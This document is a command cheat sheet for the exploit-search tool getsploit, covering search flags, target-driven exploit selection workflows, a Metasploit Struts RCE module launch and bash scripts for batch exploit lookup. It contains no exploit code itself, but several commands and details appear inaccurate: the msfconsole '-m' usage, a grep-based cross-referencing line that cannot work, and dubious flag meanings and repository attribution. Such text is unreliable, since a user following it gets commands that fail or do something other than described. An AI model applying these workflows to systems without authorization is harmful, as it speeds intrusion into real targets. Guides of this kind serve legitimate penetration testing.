getsploit
Overview
getsploit is a command-line tool that searches and downloads exploit code from multiple repositories including Exploit-DB, Metasploit Framework, and Packet Storm Security. It aggregates exploit intelligence for vulnerability research and authorized penetration testing activities.
getsploit is essential for:
- Exploit proof-of-concept research
- Vulnerability validation and verification
- Penetration testing and assessment
- Exploit code adaptation and customization
- Security research and analysis
- Attack surface evaluation
Installation
Prerequisites
- Python 3.6+
- pip (Python package manager)
- Linux/macOS/Windows
- Internet connectivity
Install via pip
# Install from PyPI
pip install getsploit
# Verify installation
getsploit -V
getsploit --helpInstall from Source
# Clone repository
git clone https://github.com/vulhub/getsploit.git
cd getsploit
# Install dependencies
pip install -r requirements.txt
# Run directly
python -m getsploit --help
# Or install locally
pip install -e .Update
# Update to latest version
pip install --upgrade getsploit
# Check version
getsploit --versionCore Commands
Basic Usage
| Command | Purpose | Example |
|---|---|---|
getsploit <query> | Search for exploits | getsploit apache 2.4.49 |
getsploit -h | Show help | getsploit -h |
getsploit -V | Show version | getsploit -V |
getsploit --update | Update exploit database | getsploit --update |
Search Options
| Option | Purpose | Example |
|---|---|---|
-e, --edb | Search Exploit-DB only | getsploit -e "CVE-2021-1234" |
-m, --msf | Search Metasploit only | getsploit -m "windows privilege" |
-p, --pst | Search Packet Storm only | getsploit -p "php vulnerability" |
-t, --type | Filter by exploit type | getsploit -t "remote" apache |
Basic Search Operations
Simple Exploit Search
# Search all repositories
getsploit apache 2.4.49
# Search by CVE number
getsploit CVE-2021-44228
# Search by application
getsploit wordpress
# Search by vulnerability type
getsploit "remote code execution"Search with Repository Filter
# Search Exploit-DB only
getsploit -e "nginx privilege escalation"
# Search Metasploit only
getsploit -m "windows domain privilege"
# Search Packet Storm only
getsploit -p "php injection"Filter by Exploit Type
# Find remote code execution exploits
getsploit -t "remote" "apache"
# Find local privilege escalation
getsploit -t "local" "kernel"
# Find denial of service
getsploit -t "dos" "dns"Exploit Database Search Strategies
Search by Vulnerability
# SQL injection exploits
getsploit "sql injection" wordpress
# Cross-site scripting
getsploit "xss" "drupal"
# Path traversal
getsploit "path traversal" php
# Command injection
getsploit "command injection" webSearch by Application
# WordPress vulnerabilities
getsploit wordpress
# Drupal exploits
getsploit drupal
# Apache web server
getsploit apache
# PHP framework vulnerabilities
getsploit laravelSearch by OS/Platform
# Windows privilege escalation
getsploit -t "local" "windows"
# Linux kernel exploits
getsploit -t "local" "linux kernel"
# macOS vulnerabilities
getsploit -t "remote" "macos"Advanced Search Techniques
Multi-Term Searches
# Combine application and version
getsploit "apache 2.4.49"
# With vulnerability type
getsploit "wordpress 5.0 remote"
# Application and CVE
getsploit "wordpress CVE-2020"Specific CVE Research
# Log4j vulnerability (widespread)
getsploit CVE-2021-44228
# WordPress plugin vulnerability
getsploit CVE-2020-6450
# Kernel privilege escalation
getsploit CVE-2021-22555Vulnerability Pattern Searches
# All Struts vulnerabilities
getsploit "apache struts"
# Tomcat exploits
getsploit "tomcat"
# Node.js vulnerabilities
getsploit "node.js" -t "remote"Download and Extraction
Download Exploit Code
# Search returns exploit information
getsploit apache 2.4.49
# Output shows:
# - Exploit ID
# - Title
# - Type
# - Link to code
# - Source repositoryView Exploit Details
# Search with verbose output
getsploit -v apache 2.4.49
# Review exploit information before download
# - Author
# - Verification status
# - Last updated dateSave Search Results
# Redirect output to file
getsploit wordpress > wordpress_exploits.txt
# Save specific results
getsploit -e "sql injection" > edb_sqli.txt
# Parse results programmatically
getsploit apache 2.4.49 | grep -oE "exploit-[0-9]+|cve-[0-9-]+"Practical Exploitation Workflows
Vulnerability Assessment Workflow
# 1. Identify target technology
# Example: WordPress 5.0 running
# 2. Search for known vulnerabilities
getsploit "wordpress 5.0"
# 3. Review exploit types
getsploit -e "wordpress 5.0" | grep -i "plugin\|theme"
# 4. Download promising exploits
# (Follow links from search results)
# 5. Analyze code for applicability
# (Test in lab environment first)Known CVE Exploitation
# 1. Identify CVE
# Example: CVE-2021-44228 (Log4j)
# 2. Find exploits
getsploit CVE-2021-44228
# 3. Search specific sources
getsploit -m CVE-2021-44228 # Metasploit modules
getsploit -e CVE-2021-44228 # Exploit-DB POCs
# 4. Select appropriate exploit
# (Choose by platform, method, complexity)Application-Specific Research
# 1. Identify running application
# Example: Apache Struts 2.0
# 2. Search comprehensively
getsploit "apache struts"
# 3. Filter by vulnerability type
getsploit -t "remote" "apache struts"
# 4. Research by year
getsploit "struts 2009" # Earlier vulnerabilities
getsploit "struts 2017" # More recent exploitsIntegration with Other Tools
Chain with Metasploit
# Find exploit in Metasploit
getsploit -m "apache struts"
# Get module path from results
# Load in msfconsole
msfconsole -m "exploit/linux/http/apache_struts_rce"Integration with searchsploit
# Alternative: Use searchsploit (locally cached)
searchsploit "apache struts"
# Cross-reference with getsploit
getsploit "apache struts" | grep -v "$(searchsploit -t apache struts)"Organize Results for Testing
# Save organized results
mkdir -p exploit_research/wordpress
getsploit wordpress > exploit_research/wordpress/search_results.txt
mkdir -p exploit_research/drupal
getsploit drupal > exploit_research/drupal/search_results.txt
# Create index
echo "# Exploit Research Results" > exploit_research/README.mdExploit Classification and Analysis
Classify by Exploitation Method
# Remote code execution
getsploit -t "remote" "application"
# Privilege escalation
getsploit -t "local" "privilege"
# Denial of service
getsploit -t "dos" "service"
# Authentication bypass
getsploit "authentication bypass" appAnalyze Exploit Reliability
# Search for verified/tested exploits
getsploit -e "apache" # Exploit-DB (verified)
# Search for modules
getsploit -m "wordpress" # Metasploit (tested)
# Review multiple sources
getsploit -p "wordpress" # Packet Storm (research)Filter by Exploit Status
# Recently added exploits
getsploit -e "2024" wordpress
# Older, battle-tested exploits
getsploit -e "2015" linux
# Compare exploit counts
getsploit -m "apache" | wc -l
getsploit -e "apache" | wc -lAutomation Scripts
Batch Vulnerability Scanning
#!/bin/bash
# Search for exploits for multiple CVEs
CVES=(
"CVE-2021-44228"
"CVE-2021-22555"
"CVE-2020-1938"
)
OUTPUT_DIR="cve_research"
mkdir -p "$OUTPUT_DIR"
for cve in "${CVES[@]}"; do
echo "Researching $cve..."
getsploit "$cve" > "$OUTPUT_DIR/${cve}_results.txt"
# Count exploits found
COUNT=$(wc -l < "$OUTPUT_DIR/${cve}_results.txt")
echo "$cve: $COUNT results found"
doneVulnerability Database Builder
#!/bin/bash
# Build database of exploits for target technologies
TARGETS=(
"wordpress"
"drupal"
"joomla"
"apache"
"nginx"
)
DB_DIR="exploit_database"
mkdir -p "$DB_DIR"
for target in "${TARGETS[@]}"; do
echo "Building database for $target..."
# Search all sources
getsploit -e "$target" > "$DB_DIR/${target}_edb.txt"
getsploit -m "$target" > "$DB_DIR/${target}_msf.txt"
getsploit -p "$target" > "$DB_DIR/${target}_pst.txt"
# Create summary
TOTAL=$(($(wc -l < "$DB_DIR/${target}_edb.txt") + \
$(wc -l < "$DB_DIR/${target}_msf.txt") + \
$(wc -l < "$DB_DIR/${target}_pst.txt")))
echo "$target: $TOTAL exploits indexed"
doneContinuous Vulnerability Monitoring
#!/bin/bash
# Monitor new exploits for critical applications
MONITOR_TARGETS=(
"wordpress"
"apache"
"openssh"
)
RESULTS_DIR="vulnerability_monitoring"
mkdir -p "$RESULTS_DIR"
DATE=$(date +%Y%m%d)
for target in "${MONITOR_TARGETS[@]}"; do
LATEST_FILE="$RESULTS_DIR/${target}_latest.txt"
CURRENT_FILE="$RESULTS_DIR/${target}_${DATE}.txt"
# Get current exploits
getsploit "$target" | sort > "$CURRENT_FILE"
# Compare with previous
if [ -f "$LATEST_FILE" ]; then
NEW_EXPLOITS=$(comm -13 "$LATEST_FILE" "$CURRENT_FILE")
if [ -n "$NEW_EXPLOITS" ]; then
echo "New exploits for $target:"
echo "$NEW_EXPLOITS"
fi
fi
# Update latest
cp "$CURRENT_FILE" "$LATEST_FILE"
doneSearch Result Analysis
Parse Search Results
# Extract exploit IDs
getsploit apache | grep -oE "EDB-[0-9]+" | sort -u
# Extract CVE references
getsploit wordpress | grep -oE "CVE-[0-9-]+" | sort -u
# Count results by type
getsploit apache | grep -c "remote"
getsploit apache | grep -c "local"Compare Sources
# Find exploits in Exploit-DB
getsploit -e wordpress > edb_wp.txt
# Find exploits in Metasploit
getsploit -m wordpress > msf_wp.txt
# Find unique to Exploit-DB
comm -23 <(sort edb_wp.txt) <(sort msf_wp.txt)
# Find in all sources
getsploit wordpress | sort -u > all_wp.txtBest Practices
Responsible Exploit Research
- Verify applicability: Confirm vulnerability affects target before exploitation
- Test in isolated lab: Always test in controlled environment first
- Review exploit code: Analyze code for malicious intent before execution
- Maintain documentation: Track exploit usage for reporting
- Only test authorized targets: Ensure proper authorization before testing
- Keep audit trail: Document all exploit testing activities
- Update regularly: Keep exploit database current with
--update
Effective Search Strategies
- Use specific terms: More specific searches yield relevant results
- Include version numbers: Narrow results with application versions
- Cross-reference CVEs: Verify CVE numbers with multiple sources
- Search all repositories: Different sources contain unique exploits
- Review metadata: Check author, date, and verification status
- Compare multiple exploits: Select most reliable implementation
Troubleshooting
| Issue | Solution |
|---|---|
| No results found | Try broader search terms or different keywords |
| Connection errors | Check internet connectivity; verify target is accessible |
| Old database | Run getsploit --update to refresh exploit database |
| Exploit not found | Try searching by CVE number or different terms |
| Metasploit results | Verify Metasploit Framework installation for module paths |
Update and Maintenance
Keep Database Current
# Update exploit database
getsploit --update
# Schedule regular updates (cron)
0 0 * * * /usr/local/bin/getsploit --update # Daily at midnightResources
- GitHub: https://github.com/vulhub/getsploit
- Exploit-DB: https://www.exploit-db.com/
- Metasploit Framework: https://www.metasploit.com/
- Packet Storm Security: https://packetstormsecurity.com/
- CVE Details: https://www.cvedetails.com/
Summary
getsploit aggregates exploit intelligence from multiple authoritative sources:
- Exploit-DB - Largest public exploit repository
- Metasploit Framework - Professional exploitation platform
- Packet Storm Security - Historical vulnerability research
Key capabilities include:
- Multi-repository exploit searching
- Flexible filtering by type and source
- CVE-based vulnerability research
- Integration with exploitation frameworks
- Automated vulnerability monitoring
Use getsploit to research known vulnerabilities, validate attack vectors, and build exploit collections for authorized penetration testing and security assessment activities.